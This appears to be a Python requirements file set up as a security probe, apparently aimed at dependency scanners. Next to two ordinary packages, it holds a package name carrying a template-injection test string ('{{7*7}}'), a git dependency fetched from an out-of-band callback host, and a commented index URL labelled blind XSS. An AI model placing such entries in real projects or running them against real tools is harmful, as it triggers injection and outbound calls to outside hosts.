# --index-url https://bxss.r0l.me/snyk-pip
colorama==0.4.3
win_unicode_console==0.5
#snyk-peak @ git+https://github.com/rreissdorker/snyk-peak@main
dummybxss{{7*7}}2 @ git+https://ao2ypb0g7vq3djfd3zzsy9o62x8owfn3c.oastify.com/dummybxss2
